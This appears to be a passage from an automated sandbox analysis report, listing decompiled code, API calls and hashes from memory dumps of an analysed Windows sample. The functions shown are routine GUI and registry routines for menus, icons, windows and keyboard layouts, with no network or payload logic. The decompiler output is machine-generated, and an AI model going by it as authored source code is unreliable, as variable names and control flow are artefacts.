Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: ab7b0c4230b43bcc77b16b5e02aa112d977b6b6fc4ed4ff17240baf5f0a39223
Instruction ID: 2fba6fd25629883dca0f1e4ea6d0808ad623a491012ca4e8f6240949a9184519
Opcode Fuzzy Hash: ab7b0c4230b43bcc77b16b5e02aa112d977b6b6fc4ed4ff17240baf5f0a39223
Instruction Fuzzy Hash: 412188F1A00218BBDB10DBA5CD95FAE73BCEB08704F5105A6F704F61C1D6786E508728

Uniqueness

Uniqueness Score: -1.00%

Function 0046B9CC, Relevance: 10.7, APIs: 7, Instructions: 199
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0046B9CC(intOrPtr* __eax, signed int __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v5;
				char _v6;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				char _v52;
				char _v56;
				signed char _t93;
				signed int _t177;
				intOrPtr* _t211;
				void* _t213;
				void* _t214;
				void* _t216;

				_t215 = _t216;
				_v56 = 0;
				_t213 = __edx;
				_t211 = __eax;
				 *[fs:eax] = _t216 + 0xffffffcc;
				E004202C4( *((intOrPtr*)(__eax + 0x218)),  *((intOrPtr*)(__edx + 0x18)));
				_t179 =  *_t211;
				 *((intOrPtr*)( *_t211 + 0x44))( *[fs:eax], 0x46bc49, _t216, __edi, __esi, __ebx, _t214);
				_t93 =  *(__edx + 0x10);
				_t177 = __ebx & 0xffffff00 | (_t93 & 0x00000001) != 0x00000000;
				_v5 = (_t93 & 0x00000010) != 0;
				if( *((intOrPtr*)( *_t211 + 0x50))() != 0) {
					__eflags = _t177;
					if(_t177 == 0) {
						_v6 = 0;
					} else {
						_v6 = 2;
					}
				} else {
					_v6 = 1;
				}
				_v12 = 0x2010;
				if(_t177 != 0) {
					_v12 = _v12 | 0x00000200;
				}
				if(( *(_t213 + 0x10) & 0x00000004) != 0) {
					_v12 = _v12 | 0x00000100;
				}
				_t225 =  *(_t211 + 0x22c) | _v5;
				if(( *(_t211 + 0x22c) | _v5) != 0) {
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 0x80000006, _t211, _t215);
					E0041F5E4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 1, _t211, _t215);
					E0041F8D4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t179, 1, _t211, _t215, _t225);
					_t179 = _v28.top;
					E0041FF8C( *((intOrPtr*)(_t211 + 0x218)), _v28.top, _v28.left, _v28.bottom, _v28.right);
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				_t226 = _t177;
				if(_t177 == 0) {
					DrawFrameControl( *(_t213 + 0x18),  &_v28, 4, _v12);
				} else {
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 0x80000010, _t211, _t215);
					E0041F5E4( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)), _t179, 1, _t211, _t215);
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t179, 0x8000000f, _t211, _t215, _t226);
					E0041FF8C( *((intOrPtr*)(_t211 + 0x218)), _v28.top, _v28.left, _v28.bottom, _v28.right);
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				if( *(_t211 + 0x22c) != 0) {
					 *((intOrPtr*)( *_t211 + 0x44))();
					InflateRect( &_v28, 0xffffffff, 0xffffffff);
				}
				E00420140( *((intOrPtr*)(_t211 + 0x218)));
				_t228 = _t177;
				if(_t177 != 0) {
					OffsetRect( &_v28, 1, 1);
				}
				E00412A88(0,  &_v52, 0);
				E00438CBC(_t211,  &_v56);
				E0046ABAC( *((intOrPtr*)(_t211 + 0x21c)),  &_v28,  *((intOrPtr*)(_t211 + 0x218)),  &_v44, E0043AFD4(_t211, 0, _t228), 0, _v6,  *((intOrPtr*)(_t211 + 0x224)),  *((intOrPtr*)(_t211 + 0x228)),  *((intOrPtr*)(_t211 + 0x222)), _v56,  &_v52);
				_t229 =  *(_t211 + 0x22c) & _v5;
				if(( *(_t211 + 0x22c) & _v5) != 0) {
					_t184 =  *_t211;
					 *((intOrPtr*)( *_t211 + 0x44))();
					InflateRect( &_v28, 0xfffffffc, 0xfffffffc);
					E0041F4B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x10)),  *_t211, 0x80000006, _t211, _t215);
					E0041F7B8( *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x218)) + 0x14)), _t184, 0x8000000f, _t211, _t215, _t229);
					DrawFocusRect(E00420244( *((intOrPtr*)(_t211 + 0x218))),  &_v28);
				}
				E004202C4( *((intOrPtr*)(_t211 + 0x218)), 0);
				 *[fs:eax] = 0;
				_push(0x46bc50);
				return E00404320( &_v56);
			}

0x0046b9cd
0x0046b9d7
0x0046b9da
0x0046b9dc
0x0046b9e9
0x0046b9f5
0x0046b9ff
0x0046ba01
0x0046ba04
0x0046ba09
0x0046ba0e
0x0046ba1b
0x0046ba23
0x0046ba25
0x0046ba2d
0x0046ba27
0x0046ba27
0x0046ba27
0x0046ba1d
0x0046ba1d
0x0046ba1d
0x0046ba31
0x0046ba3a
0x0046ba3c
0x0046ba3c
0x0046ba47
0x0046ba49
0x0046ba49
0x0046ba56
0x0046ba59
0x0046ba69
0x0046ba7c
0x0046ba8c
0x0046ba99
0x0046baa5
0x0046bab2
0x0046bab2
0x0046bab7
0x0046bab9
0x0046bb2a
0x0046babb
0x0046bac9
0x0046badc
0x0046baef
0x0046bb08
0x0046bb15
0x0046bb15
0x0046bb36
0x0046bb3f
0x0046bb4a
0x0046bb4a
0x0046bb58
0x0046bb5d
0x0046bb5f
0x0046bb69
0x0046bb69
0x0046bb75
0x0046bb83
0x0046bbc4
0x0046bbcf
0x0046bbd2
0x0046bbd9
0x0046bbdb
0x0046bbe6
0x0046bbf9
0x0046bc0c
0x0046bc21
0x0046bc21
0x0046bc2e
0x0046bc38
0x0046bc3b
0x0046bc48

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 0046BAB2
InflateRect.USER32(?,000000FF,000000FF), ref: 0046BB15
DrawFrameControl.USER32 ref: 0046BB2A
InflateRect.USER32(?,000000FF,000000FF), ref: 0046BB4A
OffsetRect.USER32(?,00000001,00000001), ref: 0046BB69
InflateRect.USER32(?,000000FC,000000FC), ref: 0046BBE6
DrawFocusRect.USER32 ref: 0046BC21

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Inflate$Draw$ControlFocusFrameOffset
String ID:
API String ID: 92361559-0
Opcode ID: f1157a3c78035951a8d672163aed3e7d3c2b2b766211cf9721d7175d1e63f6f2
Instruction ID: b9720ecdf5906d56ef7a4a5ac6f34af7b7fdd1df251f1003558a8b10291c5349
Opcode Fuzzy Hash: f1157a3c78035951a8d672163aed3e7d3c2b2b766211cf9721d7175d1e63f6f2
Instruction Fuzzy Hash: 4F81A074B00205AFC704DBA8C885EDEF7F5BF09314F14425AB524D7392DB38A986CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00448AC4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00448AC4(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x448d1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x448d26);
					E00404320( &_v68);
					return E00404320( &_v12);
				}
				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044A900(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x471aa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x448d44) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00471A94 |  *0x00471A84 |  *0x00471A8C | 0x00000400;
							_t103 = E0044A900(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
							} else {
								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00448FC8(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044AEBC(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044A4D8(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x471ad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x448d44) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00471ACC |  *0x00471AA8 |  *0x00471ADC |  *0x00471AE4;
							_v61.fState =  *0x00471AB4 |  *0x00471AC4 |  *0x00471ABC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047D0(_v12);
							if(E0044A900(_t154) > 0) {
								_v61.hSubMenu = E00448FC8(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x448d38);
						E00448128( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404698();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x4479b8; // 0x447a04
					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00448FC8(_t154);
				goto L8;
			}

0x00448ac4
0x00448acf
0x00448ad2
0x00448ad5
0x00448ad8
0x00448ada
0x00448ade
0x00448adf
0x00448ae4
0x00448ae7
0x00448aee
0x00448d01
0x00448d03
0x00448d06
0x00448d09
0x00448d11
0x00448d1e
0x00448d1e
0x00448afa
0x00448b08
0x00448b16
0x00448b1b
0x00448b60
0x00448b6e
0x00448cba
0x00448cc2
0x00448cc7
0x00448cc9
0x00448cfc
0x00448ccb
0x00448cce
0x00448ce3
0x00448ce3
0x00000000
0x00448cc9
0x00448b74
0x00448b7b
0x00448b89
0x00448b8d
0x00448ba4
0x00448bb2
0x00448bb2
0x00000000
0x00448bb2
0x00448bae
0x00448bb0
0x00000000
0x00000000
0x00000000
0x00448bb6
0x00448bb6
0x00448bb6
0x00448bb8
0x00448bb8
0x00448c07
0x00448c2e
0x00448c35
0x00448c3a
0x00448c3f
0x00448c44
0x00448c4f
0x00448c5b
0x00448c64
0x00448c64
0x00448c70
0x00000000
0x00448c70
0x00448b8d
0x00448b1d
0x00448b20
0x00448b22
0x00448b3c
0x00448b3c
0x00448b3f
0x00448b4b
0x00448b50
0x00448b5b
0x00000000
0x00448b5b
0x00448b24
0x00448b28
0x00000000
0x00000000
0x00448b2d
0x00448b33
0x00448b38
0x00448b3a
0x00000000
0x00000000
0x00000000
0x00448b3a
0x00448b11
0x00000000

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00448C70
GetVersion.KERNEL32(00000000,00448D1F), ref: 00448B60

Part of subcall function 00448FC8: CreatePopupMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FE3

Strings

?, xrefs: 00448B7B
,, xrefs: 00448B74

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?
API String ID: 133695497-2308483597
Opcode ID: 2cee81f7da8462bb22156a7dd72272cd01dcde12bcc3e6a75ab37ec6e1055d1c
Instruction ID: 3620e664f0735d637a3e35fb76017f0ab40181e751d50135783bd704d95edd67
Opcode Fuzzy Hash: 2cee81f7da8462bb22156a7dd72272cd01dcde12bcc3e6a75ab37ec6e1055d1c
Instruction Fuzzy Hash: 6961E270A102449FEB10EF79D88169E77F6BF4A304F44447AE944E73A6DB38E845C758

Uniqueness

Uniqueness Score: -1.00%

Function 0042116C, Relevance: 10.7, APIs: 7, Instructions: 166
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042116C() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E00420FE0( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E00420FE0( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E00420FEC( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E00408334(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x421353, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E00420E24( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E00408334( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x421330);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x48f714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420594(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00421337);
				return E0040274C( *(_t198 - 0x30));
			}

0x0042116e
0x0042117d
0x00421183
0x00421186
0x00421188
0x0042118d
0x0042119e
0x004211a3
0x004211ca
0x004211cd
0x004211cd
0x004211d0
0x004211d1
0x004211d1
0x004211d1
0x0042118d
0x004211df
0x004211eb
0x004211f7
0x00421205
0x00421213
0x0042122d
0x00421240
0x0042124f
0x0042125e
0x0042126d
0x0042127d
0x0042128c
0x00421294
0x0042129f
0x004212a4
0x004212a5
0x004212aa
0x004212ad
0x004212b0
0x004212b6
0x004212be
0x004212cc
0x004212d5
0x004212de
0x004212fa
0x00421308
0x00421310
0x00421312
0x00421312
0x00421319
0x0042131c
0x0042131f
0x0042132f

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0042125E
GetObjectA.GDI32(?,00000018,?), ref: 0042126D
GetBitmapBits.GDI32(?,?,?), ref: 004212BE
GetBitmapBits.GDI32(?,?,?), ref: 004212CC
DeleteObject.GDI32(?), ref: 004212D5
DeleteObject.GDI32(?), ref: 004212DE
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00421300

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: f904337ceea57774f54c04814782ccd7b69f4f9cd6a71772fda4147054334f95
Instruction ID: 0eaf06afbd50e3b4658a88fd21f84cbb42fcff3ffb0e50a3ced3ad64ef04db03
Opcode Fuzzy Hash: f904337ceea57774f54c04814782ccd7b69f4f9cd6a71772fda4147054334f95
Instruction Fuzzy Hash: 0E610571A00229AFCB00DFA9D881DAEBBF9FF49304B554466F904EB351D734AD51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004408BC, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004408BC(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x48e838; // 0x48fc00
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x440a83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E00438CEC(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00439F48(_v8,  &_v28);
				if(E00456844() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00456844() -  *(_v8 + 0x4c);
				}
				if(E00456850() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00456850() -  *(_v8 + 0x48);
				}
				if(E00456838() > _v28) {
					_v28 = E00456838();
				}
				if(E0045682C() > _v16) {
					_v16 = E0045682C();
				}
				SetWindowPos(E0043F370(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x4718cc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00443B10( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4718cc(E0043F370(_v8), 0x64,  *0x004719D4 | 0x00040000);
					}
				}
				ShowWindow(E0043F370(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x440a8a);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}

0x004408ca
0x004408cb
0x004408cc
0x004408cd
0x004408ce
0x004408d0
0x004408d3
0x004408dc
0x004408e5
0x004408e6
0x004408eb
0x004408ee
0x004408f6
0x004408fb
0x00440905
0x0044091c
0x0044092b
0x0044092b
0x00440940
0x0044094f
0x0044094f
0x0044095c
0x00440965
0x00440965
0x00440972
0x0044097b
0x0044097b
0x004409a1
0x004409b9
0x004409e1
0x004409ea
0x004409f9
0x00440a02
0x00440a10
0x00440a1b
0x00440a1b
0x00440a1b
0x00440a3f
0x00440a3f
0x004409ea
0x00440a50
0x00440a5a
0x00440a5f
0x00440a62
0x00440a65
0x00440a72
0x00440a78
0x00440a7b
0x00440a82

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00440A83), ref: 004409A1
GetTickCount.KERNEL32 ref: 004409A6
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 004409E1
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 004409F9
AnimateWindow.USER32(00000000,00000064,00000001), ref: 00440A3F
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00440A83), ref: 00440A50
GetTickCount.KERNEL32 ref: 00440A6A

Part of subcall function 00443B10: GetCursorPos.USER32(?), ref: 00443B14

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 3864e15b6e2ca29c20f0d56c3f12c3d45805c60426092f5295886dac922d4af8
Instruction ID: b8171982469b21851f7d2e4dcd9bec4a606e817161d5f98fa6c2a4dddf90cd7a
Opcode Fuzzy Hash: 3864e15b6e2ca29c20f0d56c3f12c3d45805c60426092f5295886dac922d4af8
Instruction Fuzzy Hash: 30516174A00205EFEB10EFA9C982A9EB7F5EF04304F60456AF540E7356D778AE44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456A90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00456A90(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x456c3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x456c42);
					return E00404320( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
					E00404320(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E004163C4( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00443F80( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00409258( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x456bf7);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404588( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404588(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x456bfe);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x00456a91
0x00456a93
0x00456a9c
0x00456aa2
0x00456aa7
0x00456aa8
0x00456aad
0x00456ab0
0x00456aba
0x00456c1c
0x00456c24
0x00456c27
0x00456c2a
0x00456c3a
0x00456ac0
0x00456acf
0x00456ad8
0x00456aeb
0x00456aee
0x00456c0b
0x00456c11
0x00456c17
0x00000000
0x00456af4
0x00456af5
0x00456afe
0x00456b01
0x00456b0d
0x00000000
0x00456b13
0x00456b25
0x00456b2b
0x00456b55
0x00000000
0x00456b5b
0x00456b5d
0x00456b5e
0x00456b63
0x00456b66
0x00456b69
0x00456b8f
0x00456ba2
0x00456bba
0x00456bc8
0x00456bdb
0x00456bdb
0x00456bc8
0x00456be2
0x00456be5
0x00456be8
0x00456bf6
0x00456bf6
0x00456b55
0x00000000
0x00456bfe
0x00456bfe
0x00456c02
0x00456c02
0x00456c02
0x00000000
0x00456b01
0x00456aee
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00456C3B,?,021D0F1C,?,00456C9D,00000000,?,0043B2AB), ref: 00456AE6
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00456B4E
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00456BF7,?,80000002,00000000), ref: 00456B88
RegCloseKey.ADVAPI32(?,00456BFE,00000000,?,00000100,00000000,00456BF7,?,80000002,00000000), ref: 00456BF1

Strings

layout text, xrefs: 00456B7F
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00456B38

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
